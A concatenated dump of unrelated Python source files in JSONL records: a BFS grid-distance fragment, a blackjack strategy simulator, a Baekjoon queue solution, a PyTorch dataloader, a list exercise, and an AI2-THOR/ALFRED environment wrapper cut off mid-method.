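            if grid[r][c] == 1:
                dist[r][c] = 0
                q.append((r, c))
    while q:
        r, c = q.popleft()
        for dr, dc in ((1, 1), (1, 0), (1, -1), (0, -1), (-1, -1), (-1, 0), (-1, 1), (0, 1)):
            nr, nc = r + dr, c + dc
            if 0 <= nr < n and 0 <= nc < m and dist[nr][nc] == -1:
                dist[nr][nc] = dist[r][c] + 1
                q.append((nr, nc))
    return max(max(row) for row in dist)

print(max_safety_distance([[1, 0, 0], [0, 0, 0]]))  # prints 2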
+{"seq_id":"5860276613","text":"#!/usr/bin/env python3.5\n# -*- coding: utf-8 -*-\n\n__author__ = 'tangyongfeng'\nimport json\nimport datetime\nimport threading\nimport os,errno\nimport configfile\nimport zhongcaiweiyou\nimport strategytable\nimport numpy as np\nfrom poker import *\n\n\n_DEBUG_=False\n_DEEP_DEBUG_=False\n\nclass Financial:\n\tdef __init__(self):\n\t\tself.CoinBlance=0\t\n\t\tself.DiamondBlance=0\n\t\tself.startCoinBlance=0\n\t\tself.stake=0\n\t\tself.level=0\n\t\tself.round=0\n\t\tself.stage=0\n\t\tself.accountList=[]\n\t\tself.awardList=[]\n\t\tself.blanceList=[]\n\t\tself._stage_head=True\n\tdef pocketIt(self,award):\n\t\tself.CoinBlance-=self.stake\n\t\tself.CoinBlance+=award\n\tdef nextRound(self,strategy,score,award):\n\t\tresult= self.round,strategy,score,self.stake,award,self.CoinBlance\n\t\tif _DEBUG_:\n\t\t\tprint (result)\n\t\tself.accountList.append(result)\n\t\tself.awardList.append(award)\n\t\tself.blanceList.append(self.CoinBlance)\n\t\tself.round+=1\n\tdef getStage(self):\n\t\tstage_info=''\n\t\tmean=np.mean(self.awardList)\n\t\tvar=np.var(self.awardList)\n\t\tmedian=np.median(self.awardList)\n\t\tblanceMin=np.min(self.blanceList)\n\t\tblanceMax=np.max(self.blanceList)\n\t\tif self._stage_head:\n\t\t\thead='stage,mean,median,var,blanceMin,blanceMax,stake\\n'\n\t\t\tself._stage_head=False\n\t\telse:\n\t\t\thead=''\n\t\tstage_info+=head\n\t\tstage_info+='%d,%d,%d,%d,%d,%d,%d'%(self.stage,mean,median,var,blanceMin,blanceMax,self.stake)\n\t\tself.accountList=[]\n\t\tself.awardList=[]\n\t\tself.blanceList=[]\n\t\tself.stage+=1\n\t\n\t\treturn stage_info\nclass Player:\n\tdef __init__(self):\n\t\tself.uid=0\n\t\tself.appid=0\n\t\tself.fristHand=Hand()\n\t\tself.dealerhand=Hand()\n\t\tself.financial=Financial()\n\nclass Loging:\n\tdef __init__(self,userid,session_log,detail_log,break_log,stage_log):\n\t\tpath='.//log//'+str(userid)\n\t\tself.makedir(path)\n\n\t\tself.logfilename=path+'//'+datetime.datetime.now().strftime(\"%Y-%m-%d.%H-%M-%S\")\n\n\t\tself.sessionId=1\n\t\tself.detail_Log=detail_log\n\t\tself.session_Log=session_log\n\t\tself.break_Log=break_log\n\t\tself.stage_Log=stage_log\n\t\tif self.detail_Log:\n\t\t\tself.detailfile=open(self.logfilename +'.detail.txt','w')\n\t\tif self.session_Log:\n\t\t\tself.sessionfile=open(self.logfilename+'.session.txt','w')\n\t\tif self.break_Log:\n\t\t\tself.breakfile=open(self.logfilename+'.break.txt','w')\n\t\tif self.stage_Log:\n\t\t\tself.stagefile=open(self.logfilename+'.stage.txt','w')\n\t\t\tself.stagefile.write('\\n')\n\t\t\tself.stagefile.flush()\n\tdef __del__(self):\n\t\tif self.detail_Log:\n\t\t\tself.detailfile.close()\n\t\tif self.session_Log:\n\t\t\tself.sessionfile.close()\n\t\tif self.break_Log:\n\t\t\tself.breakfile.close()\n\t\tif self.stage_Log:\n\t\t\tself.stagefile.close()\n\tdef makedir(self,path):\n\t\tos.makedirs(path,exist_ok=True)\n\n\tdef detaillog(self,buf):\n\t\tself.detailfile.write(str(self.sessionId)+','+datetime.datetime.now().strftime(\"%Y-%m-%d.%H-%M-%S\")+','+buf)\n\t\tself.detailfile.write('\\n')\n\tdef sessionlog(self,buf):\n\t\tself.sessionfile.write(str(self.sessionId)+','+datetime.datetime.now().strftime(\"%Y-%m-%d.%H-%M-%S\")+','+buf)\n\t\tself.sessionfile.write('\\n')\n\n\t\tself.sessionfile.flush()\n\t\ttry:\n\n\t\t\tself.detailfile.write('\\n')\n\t\t\tself.detailfile.flush()\n\t\texcept:\n\t\t\tpass\n\t\tself.sessionId+=1\n\n\tdef 
breaklog(self,buf,compare):\n\t\tself.breakfile.write(str(self.sessionId)+','+datetime.datetime.now().strftime(\"%Y-%m-%d.%H-%M-%S\")+','+buf+','+compare)\n\t\tself.breakfile.write('\\n')\n\t\tself.breakfile.write('\\n')\n\t\tself.breakfile.flush()\n\tdef stagelog(self,stagemessage):\n\t\tself.stagefile.write(stagemessage)\n\t\tself.stagefile.write('\\n')\n\t\tself.stagefile.flush()\n\n\n\tdef configDescription(self,config):\n\t\tresult=''\n\t\tif hasattr(config,'best_strategy'):\n\t\t\tresult+='best strategy:'+str(config.best_strategy)\n\t\t\tresult+='\\n'\n\t\tif hasattr(config,'has_double'):\n\t\t\tresult+='has double:'+str(config.has_double)\n\t\t\tresult+='\\n'\n\t\tif hasattr(config,'native_black_return'):\n\t\t\tresult+='native_black_return:'+str(config.native_black_return)\n\t\t\tresult+='\\n'\n\t\tif hasattr(config,'has_split'):\n\t\t\tresult+='has_split:'+str(config.has_split)\n\t\t\tresult+='\\n'\n\t\tif hasattr(config,'stake_start') and hasattr(config,'stake_end'):\n\t\t\tresult+='stake is start from %d to %d'%(config.stake_start,config.stake_end)\n\t\t\tresult+='\\n'\n\t\tif hasattr(config,'stage_size') and hasattr(config,'stake_stride'):\n\t\t\tresult+='add %d stake per %d round'%(config.stake_stride,config.stage_size)\n\t\t\tresult+='\\n'\n\t\tresult+='\\n'\n\t\tself._config=config\n\n\t\treturn result\n \n\t\t\n\t\t\n\n\n\nclass Simuclient(threading.Thread):\n\t\n\n\tdef __init__(self,userid):\n\t\tthreading.Thread.__init__(self)\n\t\t\n\t\tself.starttime=datetime.datetime.now()\n\t\tself.config=configfile.ConfigFile().userconfig(userid)\n\t\t\n\t\tself.uid=userid\n\t\tself.win=0\n\t\tself.lost=0\n\t\tself.push=0\n\n\t\tself.net=zhongcaiweiyou.zhongcaiweiyou()\n\t\tself.player=Player()\n\t\tself.strategy=strategytable.Strategy(self.config.best_strategy)\n\t\tself.loging=Loging(userid,self.config.session_log,self.config.detail_log,self.config.break_log,self.config.stage_log)\n\t\tif self.config.session_log_head:\n\t\t\tresult=self.loging.configDescription(self.config)\n\t\t\tself.loging.sessionfile.write(result)\n\t\t\tself.loging.sessionfile.flush()\n\t\tif self.config.stage_log_head:\n\t\t\tresult=self.loging.configDescription(self.config)\n\t\t\tself.loging.stagefile.write(result)\n\t\t\tself.loging.stagefile.flush()\n\n\n\tdef __del__(self):\n\t\ttry:\n\t\t\tif self.net._connected:\n\t\t\t\tself.net.disconnect()\n\t\texcept:\n\t\t\tpass\n\tdef run(self):\n\t\tself.player_action()\n\t\t\n\tdef deal(self,stake):\n\t\tself.player.bust=False\n\t\tif (self.player.financial.CoinBlance>100):\n\t\t\tself.player.fristHand,self.player.dealerhand= self.net.deal(stake)\n\t\telse:\n\t\t\tself.roundState='OUTOFMONEY'\n\t\t\tif _DEBUG_:\n\t\t\t\tprint (\"insufficient blance\")\n\n\tdef hit(self):\n\t\ta,b=self.net.hit()\n\t\tif a.get_count()>0:\n\t\t\tself.player.fristHand=a\n\t\tif b.get_count()>0:\n\t\t\tself.player.dealerhand=b\n\n\tdef double(self):\n\t\ta,b=self.net.double()\n\t\tif a.get_count()>0:\n\t\t\tself.player.fristHand=a\n\t\tif b.get_count()>0:\n\t\t\tself.player.dealerhand=b\n\n\tdef stand(self):\n\t\ta,b=self.net.stand()\n\t\tif a.get_count()>0:\n\t\t\tself.player.fristHand=a\n\t\tif b.get_count()>0:\n\t\t\tself.player.dealerhand=b\n\n\tdef login(self,userid,appid):\n\t\tself.player.financial.CoinBlance= self.net.login(userid,appid)\n\t\tif _DEBUG_:\n\t\t\tprint ('in simu login')\n\t\t\tprint(\"player blance \",self.player.financial.CoinBlance)\n\t\tself.player.financial.startCoinBlance=self.player.financial.CoinBlance\n\t\treturn 
self.player.financial.CoinBlance\n\t\t\n\t\t\n\tdef getJudgment(self,playerhand,dealerhand,stake):\n\t\tself.roundState='DEAL'\n\t\taward=0\n\t\tif playerhand.get_value()>21:\n\t\t\tresult= 'DEALER_WIN'\n\t\t\tself.lost+=1\n\t\t\taward=0\n\t\telif dealerhand.get_value()>21:\n\t\t\tresult= 'PLAYER_WIN'\n\t\t\tself.win+=1\n\t\t\taward=stake*2\n\t\telif (playerhand.get_count()==2) and (playerhand.get_value()==21):\n\t\t\tresult= 'PLAYER_BLACKJACK'\n\t\t\tself.win+=1\n\t\t\taward=stake*self.config.native_black_return\n\n\t\telif playerhand.get_value()>dealerhand.get_value():\n\t\t\tresult= 'PLAYER_WIN'\n\t\t\tself.win+=1\n\t\t\taward=stake*2\n\t\telif playerhand.get_value()<dealerhand.get_value():\n\t\t\tresult= 'DEALER_WIN'\n\t\t\tself.lost+=1\n\t\t\taward=0\n\t\telse:\n\t\t\tresult= 'PUSH'\n\t\t\tself.push+=1\n\t\t\taward=stake\n\t\treturn result,award\n\n\tdef player_action(self):\n\t\tself.roundState='DEAL'\n\t\twhile (self.player.financial.CoinBlance>100):\n\t\t\ttry:\n\t\t\t\tstrategy=''\n\t\t\t\twiner=''\n\t\t\t\tif self.roundState=='DEAL':\n\t\t\t\t\troundStake=self.player.financial.stake\n\t\t\t\t\tresult=self.deal(self.player.financial.stake)\n\t\t\t\t\tself.detailMaker(self.player.fristHand,self.player.dealerhand,self.roundState,strategy,winer)\n\n\t\t\t\t\tif self.player.fristHand.get_value()!=21:\n\t\t\t\t\t\tself.roundState='HIT'\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.roundState='SETTLE'\n\t\t\t\tif _DEEP_DEBUG_ :\n\t\t\t\t\tprint ('after deal')\n\t\t\t\t\tprint ('stage,round,stake,stage size')\n\t\t\t\t\tprint (self.player.financial.stage,self.player.financial.round,self.player.financial.stake,self.config.stage_size)\n\n\t\t\t\tif self.roundState=='HIT':\n\t\t\t\t\tstrategy=self.strategy.getStrategy(self.player.fristHand,self.player.dealerhand)\n\t\t\t\t\tif (strategy=='H') or (strategy=='P'):\n\t\t\t\t\t\tresult=self.hit()\n\n\t\t\t\t\t\tself.detailMaker(self.player.fristHand,self.player.dealerhand,self.roundState,strategy,winer)\n\n\t\t\t\t\t\tif self.player.fristHand.get_value()<=21:\n\t\t\t\t\t\t\tself.roundState='HIT'\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.roundState='SETTLE'\n\n\t\t\t\t\telif strategy=='D':\n\t\t\t\t\t\tself.player.financial.stake*=2\n\t\t\t\t\t\tresult=self.double()\n\t\t\t\t\t\t\n\t\t\t\t\t\tself.detailMaker(self.player.fristHand,self.player.dealerhand,self.roundState,strategy,winer)\n\t\t\t\t\t\tself.roundState='SETTLE'\n\n\t\t\t\t\t\t\n\t\t\t\t\telif strategy=='P':\n\t\t\t\t\t\tpass\n\n\t\t\t\t\telif strategy=='S':\n\t\t\t\t\t\tresult=self.stand()\n\t\t\t\t\t\tself.detailMaker(self.player.fristHand,self.player.dealerhand,self.roundState,strategy,winer)\n\t\t\t\t\t\tself.roundState='SETTLE'\n\n\t\t\t\tif self.roundState=='SETTLE':\n\t\t\t\t\twiner,award=self.getJudgment(self.player.fristHand,self.player.dealerhand,self.player.financial.stake)\n\t\t\t\t\tif _DEEP_DEBUG_ :\n\t\t\t\t\t\tprint ('Judgment over')\n\t\t\t\t\t\tprint ('stage,round,stake,stage size')\n\t\t\t\t\t\tprint (self.player.financial.stage,self.player.financial.round,self.player.financial.stake,self.config.stage_size)\n\n\t\t\t\t\tself.detailMaker(self.player.fristHand,self.player.dealerhand,self.roundState,strategy,winer)\n\t\t\t\t\tself.player.financial.stake=roundStake\n\t\t\t\t\tself.roundVerify(strategy,winer,award)\n\t\t\t\t\tif _DEEP_DEBUG_ :\n\t\t\t\t\t\tprint ('round over')\n\t\t\t\t\t\tprint ('stage,round,stake,stage size')\n\t\t\t\t\t\tprint (self.player.financial.stage,self.player.financial.round,self.player.financial.stake,self.config.stage_size)\n\n\t\t\texcept IOError as e:\n\t\t\t\tprint (e)\n\n\ndef main():\n\tconfig=configfile.ConfigFile()\n\n\n\tcli=[]\n\tstart_uid=config.mainconfig.start_user_id\n\tend_uid=config.mainconfig.end_user_id\n\n\tfor i in 
range(start_uid,end_uid+1):\n\t\tcli.insert((i-start_uid),Simuclient(i))\n\t\tcli[i-start_uid].start()\n\t\tprint ('simu thread ', i, ' Started')\n\tprint(\"go go go!\")\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tangyongfeng/simu","sub_path":"simu.py","file_name":"simu.py","file_ext":"py","file_size_in_byte":12026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22454999553","text":"class Node:\n def __init__(self, x=-1):\n self.link = None\n self.data = x\n self.size = 0\n self.isImport = False\n \n def push(self, nextNode):\n self.link = nextNode\n \n def pop(self):\n self.link = self.link.link\n \ntotal = int(input())\n\n\ndef importantIndex(head):\n index = 0\n\n max_data = head.link.data\n h = head.link.link\n i=1\n while h:\n if max_data < h.data:\n index = i\n max_data = h.data\n h = h.link\n i += 1\n return index\n \n\nfor i in range(total):\n doc, im = map(int, input().split()) \n data = list(map(int, input().split()))\n \n head = tail = Node()\n for i,d in enumerate(data):\n tail.push(Node(d))\n tail = tail.link\n head.size += 1\n if i == im:\n tail.isImport = True\n \n count = 1\n while True:\n index = importantIndex(head)\n \n for _ in range(index):\n tail.push(head.link)\n tail = tail.link\n head.pop()\n tail.link=None\n \n if head.link.isImport:\n print(count)\n break\n \n head.pop()\n head.size -= 1\n count+=1","repo_name":"parksey/baekjoon","sub_path":"QueueDeque/1966.py","file_name":"1966.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70002190889","text":"import torch\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\n\nclass Custom_dataset(Dataset):\n def __init__(self, input_ids, token_type_ids, attn_mask_ids, label):\n self.input = input_ids\n self.token_type = token_type_ids\n self.attn_mask = attn_mask_ids\n self.label = label\n \n def __len__(self):\n return len(self.input) \n\n def __getitem__(self, idx):\n input = self.input[idx]\n tok = self.token_type[idx]\n attn = self.attn_mask[idx]\n label = torch.tensor(self.label[idx], dtype=torch.long).view(-1)\n\n return input, attn, tok, label\n \ntrain_dataset = Custom_dataset(input_ids_t, token_type_ids_t, mask_ids_t, train_data['label'])\nvalid_dataset = Custom_dataset(input_ids_v, token_type_ids_v, mask_ids_v, valid_data['label'])\ntrain_dataloader = DataLoader(train_dataset, batch_size=Batch_size, shuffle=True)\nvalid_dataloader = DataLoader(valid_dataset, batch_size=Batch_size, shuffle=True)\n","repo_name":"younggeun-kim/korean_chat_sentiment_classification","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19948247769","text":"numbers = input().split(\", \")\nresult = []\n\nfor number in numbers:\n number = int(number)\n result.append(number)\n\nfor number in result:\n if number == 0:\n result.append(result.pop(result.index(number)))\n\nprint(result)","repo_name":"achkataa/Softuni-Programming-Fundamentals","sub_path":"listsBasics/1.Zeros to Back.py","file_name":"1.Zeros to Back.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2947488079","text":"import os\nimport sys\n\nimport cv2\nimport copy\nimport alfred_utils.gen.constants as 
constants\nimport numpy as np\nfrom collections import Counter, OrderedDict\nfrom alfred_utils.env.tasks import get_task\nfrom ai2thor.controller import Controller\nimport alfred_utils.gen.utils.image_util as image_util\nfrom alfred_utils.gen.utils import game_util\nfrom alfred_utils.gen.utils.game_util import get_objects_of_type, get_obj_of_type_closest_to_obj\nimport torch\nfrom torch.autograd import Variable\nfrom models.depth.alfred_perception_models import AlfredSegmentationAndDepthModel\n\nfrom arguments import get_args\n\nimport quaternion\nimport gym\n\nimport envs.utils.pose as pu\n\nimport matplotlib\n\nif sys.platform == 'darwin':\n matplotlib.use(\"tkagg\")\nelse:\n matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\n\nimport pickle\nfrom types import SimpleNamespace\nimport skimage.morphology\n\n\nDEFAULT_RENDER_SETTINGS = {'renderImage': True,\n 'renderDepthImage': True,\n 'renderClassImage': False,\n 'renderObjectImage': True,\n }\n\ndef noop(self):\n pass\n\nclass ThorEnvCode(Controller):\n '''\n an extension of ai2thor.controller.Controller for ALFRED tasks\n '''\n def __init__(self, args, rank, x_display=constants.X_DISPLAY,\n player_screen_height=constants.DETECTION_SCREEN_HEIGHT,\n player_screen_width=constants.DETECTION_SCREEN_WIDTH,\n quality='MediumCloseFitShadows',\n build_path=constants.BUILD_PATH,\n habitat_config=None):\n\n super().__init__(quality=quality)\n \n self.local_executable_path = build_path\n self.steps_taken = 0\n \n if args.matrix:\n Controller.lock_release = noop\n Controller.unlock_release = noop\n Controller.prune_releases = noop\n \n self.start(x_display=args.x_display,\n player_screen_height=player_screen_height,\n player_screen_width=player_screen_width)\n self.task = None\n\n # internal states\n self.cleaned_objects = set()\n self.cooled_objects = set()\n self.heated_objects = set()\n\n #initializations compatible with object_goal_env\n if args.visualize:\n plt.ion()\n if args.print_images or args.visualize:\n if args.visualize == 1:\n widths = [4, 4, 3]\n total_w = 11\n elif args.visualize == 2:\n widths = [4, 3, 3]\n total_w = 10\n else:\n widths = [4, 3]\n self.figure, self.ax = plt.subplots(1, len(widths), figsize=(6*16./9., 6),\n gridspec_kw={'width_ratios': widths},\n facecolor=\"whitesmoke\",\n num=\"Thread {}\".format(rank))\n \n self.args = args \n self.rank = rank\n \n self.action_space = gym.spaces.Discrete(3)\n\n self.observation_space = gym.spaces.Box(0, 255,\n (3, constants.SCREEN_HEIGHT,\n constants.SCREEN_WIDTH),\n dtype='uint8')\n \n self.episode_no = 0\n self.last_scene_path = None\n self.info = {}\n self.info['distance_to_goal'] = None\n self.info['spl'] = None\n self.info['success'] = None\n \n self.view_angle = 0\n self.consecutive_steps = False\n self.final_sidestep = False\n \n self.actions = []\n self.max_depth = 5\n\n if args.use_learned_depth:\n self.depth_gpu = torch.device(\"cuda:\" + str(args.depth_gpu) if args.cuda else \"cpu\")\n if not(args.valts_depth):\n bts_args = SimpleNamespace(model_name='bts_nyu_v2_pytorch_densenet161' ,\n encoder='densenet161_bts',\n dataset='alfred',\n input_height=300,\n input_width=300,\n max_depth=5,\n mode = 'test',\n device = self.depth_gpu,\n set_view_angle=False,\n load_encoder=False,\n load_decoder=False,\n bts_size=512)\n\n if self.args.depth_angle or self.args.cpp:\n bts_args.set_view_angle = True\n bts_args.load_encoder = True\n\n self.depth_pred_model = BtsModel(params=bts_args).to(device=self.depth_gpu)\n print(\"depth 
initialized\")\n\n if args.cuda:\n ckpt_path = 'models/depth/depth_models/' + args.depth_checkpoint_path \n else:\n ckpt_path = 'models/depth/depth_models/' + args.depth_checkpoint_path \n checkpoint = torch.load(ckpt_path, map_location=self.depth_gpu)['model']\n\n new_checkpoint = OrderedDict()\n for k, v in checkpoint.items():\n name = k[7:] # remove `module.`\n new_checkpoint[name] = v\n del checkpoint\n # load params\n self.depth_pred_model.load_state_dict(new_checkpoint)\n self.depth_pred_model.eval()\n self.depth_pred_model.to(device=self.depth_gpu)\n\n #Use Valts depth\n else:\n\n model_path ='valts/model-2000-best_silog_10.13741' #45 degrees only model\n\n if self.args.depth_model_old:\n model_path ='valts/model-34000-best_silog_16.80614'\n\n elif self.args.depth_model_45_only:\n model_path = 'valts/model-500-best_d3_0.98919'\n\n self.depth_pred_model = AlfredSegmentationAndDepthModel()\n\n state_dict = torch.load('models/depth/depth_models/' +model_path, map_location=self.depth_gpu)['model']\n\n new_checkpoint = OrderedDict()\n for k, v in state_dict.items():\n name = k[7:] # remove `module.`\n new_checkpoint[name] = v\n \n state_dict = new_checkpoint\n del new_checkpoint\n\n self.depth_pred_model.load_state_dict(state_dict)\n self.depth_pred_model.eval()\n self.depth_pred_model.to(device=self.depth_gpu)\n\n if self.args.separate_depth_for_straight:\n model_path = 'valts0/model-102500-best_silog_17.00430'\n\n \n\n self.depth_pred_model_0 = AlfredSegmentationAndDepthModel()\n state_dict = torch.load('models/depth/depth_models/' +model_path, map_location=self.depth_gpu)['model']\n\n new_checkpoint = OrderedDict()\n for k, v in state_dict.items():\n name = k[7:] # remove `module.`\n new_checkpoint[name] = v\n \n state_dict = new_checkpoint\n del new_checkpoint\n\n self.depth_pred_model_0.load_state_dict(state_dict)\n self.depth_pred_model_0.eval()\n self.depth_pred_model_0.to(device=self.depth_gpu)\n \n \n print(\"ThorEnv started.\")\n \n #Added for my convenience\n def setup_scene(self, traj_data, task_type, r_idx, args, reward_type='dense'):\n '''\n intialize the scene and agent from the task info\n '''\n # scene setup\n self.view_angle = 30\n scene_num = traj_data['scene']['scene_num']\n object_poses = traj_data['scene']['object_poses']\n dirty_and_empty = traj_data['scene']['dirty_and_empty']\n object_toggles = traj_data['scene']['object_toggles']\n self.steps_taken = 0\n self.errs = []\n self.actions = [dict(action=\"LookDown_15\", forceAction=True)]\n if not(self.args.approx_horizon):\n self.camera_horizon =0\n else:\n self.camera_horizon = 0\n\n scene_name = 'FloorPlan%d' % scene_num\n self.reset(scene_name, return_event=True)\n self.restore_scene(object_poses, object_toggles, dirty_and_empty)\n if not(self.args.test):\n self.set_task(traj_data, task_type, args, task_type_optional=task_type)\n\n # initialize to start position\n init_dict = dict(traj_data['scene']['init_action'])\n obs, _, _, info = self.step(init_dict)\n if not(self.args.approx_horizon):\n self.camera_horizon =self.event.metadata['agent']['cameraHorizon']\n else:\n self.camera_horizon = 30\n obs, _, _, info = self.step(dict(action='LookDown_15',\n forceAction=True))\n objects = self.event.metadata[\"objects\"]\n tables = []\n \n if not(r_idx is None):\n print(\"Task: %s\" % (traj_data['turk_annotations']['anns'][r_idx]['task_desc']))\n\n # setup task for reward\n if not(self.args.test):\n self.set_task(traj_data, task_type, args, reward_type=reward_type, task_type_optional=task_type)\n self.info = info\n \n 
return obs, info\n\n\n def reset(self, scene_name_or_num,\n grid_size=constants.AGENT_STEP_SIZE / constants.RECORD_SMOOTHING_FACTOR,\n camera_y=constants.CAMERA_HEIGHT_OFFSET,\n render_image=constants.RENDER_IMAGE,\n render_depth_image=constants.RENDER_DEPTH_IMAGE,\n render_class_image=constants.RENDER_CLASS_IMAGE,\n render_object_image=constants.RENDER_OBJECT_IMAGE,\n visibility_distance=constants.VISIBILITY_DISTANCE,\n return_event = False):\n '''\n reset scene and task states\n '''\n print(\"Resetting ThorEnv\")\n\n if type(scene_name_or_num) == str:\n scene_name = scene_name_or_num\n else:\n scene_name = 'FloorPlan%d' % scene_name_or_num\n\n self.accumulated_pose = np.array([0.0,0.0,0.0])\n super().reset(scene_name)\n event = super().step(dict(\n action='Initialize',\n gridSize=grid_size,\n cameraY=camera_y,\n renderImage=render_image,\n renderDepthImage=render_depth_image,\n renderClassImage=render_class_image,\n renderObjectImage=render_object_image,\n visibility_distance=visibility_distance,\n makeAgentsVisible=False,\n ))\n self.event = event\n\n # reset task if specified\n if self.task is not None:\n self.task.reset()\n\n # clear object state changes\n self.reset_states()\n \n self.timestep = 0\n self.stopped = False\n self.path_length = 1e-5\n \n self.info['time'] = self.timestep\n self.info['sensor_pose'] = [0., 0., 0.]\n \n self.last_sim_location = self.get_sim_location()\n self.o = 0.0\n self.o_behind = 0.0\n \n if return_event:\n return event\n else:\n rgb = torch.tensor(event.frame.copy()).numpy() #shape (h, w, 3)\n depth = torch.tensor(event.depth_frame.copy()).numpy() #shape (h, w)\n depth /= 1000.0\n depth = np.expand_dims(depth, 2)\n \n state = np.concatenate((rgb, depth), axis = 2).transpose(2, 0, 1)\n \n return state, self.info\n\n\n def get_pose_change_approx(self, last_action, whether_success):\n if not(whether_success):\n return 0.0, 0.0, 0.0\n else:\n if \"MoveAhead\" in last_action:\n dx, dy, do = 0.25, 0.0, 0.0\n elif \"RotateLeft\" in last_action:\n dx, dy = 0.0, 0.0\n do = np.pi/2\n elif \"RotateRight\" in last_action:\n dx, dy = 0.0, 0.0\n do = -np.pi/2\n else:\n dx, dy, do = 0.0, 0.0, 0.0\n\n return dx, dy, do \n\n def get_pose_change_approx_relative(self, last_action, whether_success):\n if not(whether_success):\n return 0.0, 0.0, 0.0\n else:\n if \"MoveAhead\" in last_action:\n do = 0.0\n if abs(self.o + 2*np.pi) <=1e-1 or abs(self.o) <=1e-1 or abs(self.o - 2*np.pi) <=1e-1: #o is 0\n dx = 0.25\n dy = 0.0\n elif abs(self.o + 2*np.pi - np.pi/2) <=1e-1 or abs(self.o - np.pi/2) <=1e-1 or abs(self.o - 2*np.pi - np.pi/2) <=1e-1:\n dx = 0.0\n dy = 0.25\n elif abs(self.o + 2*np.pi - np.pi) <=1e-1 or abs(self.o - np.pi) <=1e-1 or abs(self.o - 2*np.pi - np.pi) <=1e-1:\n dx = -0.25\n dy = 0.0\n elif abs(self.o + 2*np.pi - 3*np.pi/2) <=1e-1 or abs(self.o - 3*np.pi/2) <=1e-1 or abs(self.o - 2*np.pi - 3*np.pi/2) <=1e-1:\n dx = 0.0\n dy = -0.25\n else:\n raise Exception(\"angle did not fall in anywhere\")\n elif \"RotateLeft\" in last_action:\n dx, dy = 0.0, 0.0\n do = np.pi/2\n elif \"RotateRight\" in last_action:\n dx, dy = 0.0, 0.0\n do = -np.pi/2\n else:\n dx, dy, do = 0.0, 0.0, 0.0\n\n self.o = self.o + do\n if self.o >= np.pi- 1e-1:\n self.o -= 2 * np.pi\n\n return dx, dy, do \n\n #Just closest angle by 15 degrees to the horizon\n def view_angle(self):\n hor = int(self.event.metadata['agent']['cameraHorizon']) \n remainder = hor % 15\n remnant = int(hor/15)\n if remainder <= 7:\n return hor - remainder\n else:\n return 15 * (remnant +1)\n\n def reset_states(self):\n 
'''\n clear state changes\n '''\n self.cleaned_objects = set()\n self.cooled_objects = set()\n self.heated_objects = set()\n\n def restore_scene(self, object_poses, object_toggles, dirty_and_empty):\n '''\n restore object locations and states\n '''\n super().step(dict(\n action='Initialize',\n gridSize=constants.AGENT_STEP_SIZE / constants.RECORD_SMOOTHING_FACTOR,\n cameraY=constants.CAMERA_HEIGHT_OFFSET,\n renderImage=constants.RENDER_IMAGE,\n renderDepthImage=constants.RENDER_DEPTH_IMAGE,\n renderClassImage=constants.RENDER_CLASS_IMAGE,\n renderObjectImage=constants.RENDER_OBJECT_IMAGE,\n visibility_distance=constants.VISIBILITY_DISTANCE,\n makeAgentsVisible=False,\n ))\n if len(object_toggles) > 0:\n super().step((dict(action='SetObjectToggles', objectToggles=object_toggles)))\n\n if dirty_and_empty:\n super().step(dict(action='SetStateOfAllObjects',\n StateChange=\"CanBeDirty\",\n forceAction=True))\n super().step(dict(action='SetStateOfAllObjects',\n StateChange=\"CanBeFilled\",\n forceAction=False))\n super().step((dict(action='SetObjectPoses', objectPoses=object_poses)))\n\n def set_task(self, traj, task_type, args, reward_type='sparse', max_episode_length=2000, task_type_optional=None):\n '''\n set the current task type (one of 7 tasks)\n '''\n self.task = get_task(task_type, traj, self, args, reward_type=reward_type, max_episode_length=max_episode_length, task_type_optional=task_type_optional)\n \n def depth_center(self, depth_est):\n ht, wd, = 300, 300 \n ww = 544; hh = 416 #Change accordingly \n xx = (ww - wd) // 2\n yy = (hh - ht) // 2\n\n return depth_est[:, :, yy:yy+ht, xx:xx+wd]\n\n def pad_rgb(self, rgb, ww=544, hh=416):\n ht, wd, cc= rgb.shape\n ht, wd, = 300, 300 \n\n # create new image of desired size, filled with the padding color\n color = (255,255,255) #white\n result = np.full((hh,ww,cc), color, dtype=np.uint8)\n\n # compute center offset\n xx = (ww - wd) // 2\n yy = (hh - ht) // 2\n\n # copy the input image into the center of the result image\n result[yy:yy+ht, xx:xx+wd] = rgb\n return result\n\n\n def success_for_look(self, action):\n wheres = np.where(self.prev_rgb != self.event.frame)\n wheres_ar = np.zeros(self.prev_rgb.shape)\n wheres_ar[wheres] = 1\n wheres_ar = np.sum(wheres_ar, axis=2).astype(bool)\n connected_regions = skimage.morphology.label(wheres_ar, connectivity=2)\n unique_labels = [i for i in range(1, np.max(connected_regions)+1)]\n max_area = -1\n for lab in unique_labels:\n wheres_lab = np.where(connected_regions == lab)\n max_area = max(len(wheres_lab[0]), max_area)\n if action in ['OpenObject', 'CloseObject'] and max_area > 500:\n success = True\n elif max_area > 100:\n success = True\n else:\n success = False\n return success\n\n def step(self, action, smooth_nav=False):\n '''\n overrides ai2thor.controller.Controller.step() for smooth navigation and goal_condition updates\n '''\n self.prev_rgb = copy.deepcopy(self.event.frame)\n self.prev_depth = copy.deepcopy(self.event.depth_frame)\n self.prev_seg = copy.deepcopy(self.event.instance_segmentation_frame)\n if action['action'] == '<<stop>>':\n self.stopped = True\n \n else:\n if smooth_nav:\n if \"MoveAhead\" in action['action']:\n self.smooth_move_ahead(action)\n elif \"Rotate\" in action['action']:\n self.smooth_rotate(action)\n elif \"Look\" in action['action']:\n self.smooth_look(action)\n else:\n super().step(action)\n else:\n if \"LookUp\" in action['action']:\n angle = float(action['action'].split(\"_\")[1])\n self.event = self.look_angle(-angle)\n if not(self.args.approx_last_action_success) and 
